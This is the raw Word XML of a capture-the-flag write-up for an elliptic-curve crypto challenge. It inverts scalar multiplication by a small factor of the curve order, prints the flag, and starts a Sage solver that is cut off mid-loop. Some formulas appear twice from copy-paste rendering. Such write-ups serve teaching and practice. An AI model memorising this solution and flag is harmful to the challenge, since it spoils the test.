    <w:p w14:paraId="3CAEFE8C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
    <w:p w14:paraId="568FC2C8" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
    <w:p w14:paraId="4EA5A152" w14:textId="77777777" w:rsidR="005F1502" w:rsidRDefault="005F1502"/>
    <w:p w14:paraId="040EBBA5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lastRenderedPageBreak/>
        <w:t>Write-up — “Scalar multiplication is reversible… right?” (Crypto / ECC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44416482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Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9B894" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>We are given this Sage check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEAC814" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>assert (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A7797" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9AAAE8" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>EllipticCurve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="149B51F6" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">      GF(0xbde3c425157a83cbe69cee172d27e2ef9c1bd754ff052d4e7e6a26074efcea673eab9438dc45e0786c4ea54a89f9079ddb21),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A40F61" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">      [5, 7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EEBAE1" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>).order</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>).factor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>(limit=2**</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>10)[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>3][0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E841DE2" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    * </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E.lift</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>x(ZZ(int.from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>flag :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>= input('ictf{')</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>())))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B4045" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">  ).</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>x(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D5063" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">  == 0x686be42f9c3f431296a928c288145a847364bb259c9f5738270d48a7fba035377cc23b27f69d6ae0fad76d745fab25d504d5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1BE15" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945F67C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>It:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DB822" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">Defines an elliptic curve </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E:y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2=x3+5x+7E: y^2 = x^3 + 5x + 7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E:y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2=x3+5x+7 over a big prime field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255DB5F6" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> rrr be a small factor of </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>|E|</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> (457).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A6E65" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:t>Takes the flag string, interprets it as bytes → integer → xxx-coordinate, and lifts to a point PPP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C09CBDD" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:t>Checks whether x([r]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>P)x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>([r]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>P)x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>([r]P) equals the given target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDEDFCF" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> we need to </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invert [r][r][r]</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> to recover PPP, then decode its xxx-coordinate back into ASCII.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573CF239" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="79DA6F68">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58254F5E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Step 1 – Curve order and factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62C11C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>Running Sage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29972198" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>#E = 1915401112…68088</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F09691" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>r = 457</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD040E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t>v_r(#E) = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69215C95" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>That means n=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>=r</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>mn = |E| = r \cdot mn=</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>=r</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>m with rrr dividing nnn exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9B59E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="4BF0E96F">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9410C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Step 2 – Modular inverse trick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26712A40" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>If Q=[r]PQ = [r]PQ=[r]P, then mQ=OmQ = OmQ=O.</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:br/>
        <w:t>Let s≡r−1(modm)s \equiv r</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>^{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>-1} \pmod ms≡r−1(modm). Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E9843" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>[r]([s]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>Q)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>[rs]Q=[1+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>km]Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>=Q.[r]([s]Q) = [rs]Q = [1+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>km]Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> = Q.[r]([s]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>Q)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>[rs]Q=[1+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>km]Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">=Q. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D43953" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>So P0=[s]QP_0 = [s]QP0​=[s]Q is a valid preimage.</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:br/>
        <w:t>But [r][r][r] has kernel of size rrr, so there are rrr different preimages: P0+jTP_0 + jTP0​+jT, where TTT is a generator of the kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA81014" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="74381C84">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D8A76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Step 3 – Search the coset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14359761" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>Enumerate all r=457r=457r=457 candidates, interpret each x(P)x(P)x(P) as bytes, and look for printable text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD14CA" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="27AAE1F3">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16137E33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Final Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD24D3" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>ictf{mayb3_d0nt_m4ke_th3_sca1ar_a_f4ctor_0f_the_ord3r}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DA7245" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="61AAF3A1">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E7CB7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Exploit Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E31C13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Sage Solver (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>solve.sage</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B8C318" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>solve.sage</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> — invert [r] when v_r(|E</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>|)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1 and search preimages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22214BEC" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="726A5095" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>p = 0xbde3c425157a83cbe69cee172d27e2ef9c1bd754ff052d4e7e6a26074efcea673eab9438dc45e0786c4ea54a89f9079ddb21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A258A4" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">E = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>EllipticCurve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>GF(p), [5, 7])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F76CD" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>target_x = 0x686be42f9c3f431296a928c288145a847364bb259c9f5738270d48a7fba035377cc23b27f69d6ae0fad76d745fab25d504d5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED6D9D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="10930365" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">n = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E.order</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5E79F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>n.factor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>(limit=2**</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>10)[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>3][0]   # 457</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3A5DD" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>m = n // r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BEE6BB" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="40A64670" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>print(f"[i] #E = {n}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8FA7F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>print(f"[i] r = {r}, m = {m}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DEC2BD" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="1DE19604" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">Q = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E.lift</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>_x(target_x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244EA9F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>s = inverse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>mod(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>r, m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E9C76D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>P0 = s * Q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B948F92" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="2D5487E4" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve"> kernel generator T of order r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE03FB" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>cof = n // r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1B78F8" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def kernel_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>gen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC9231" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
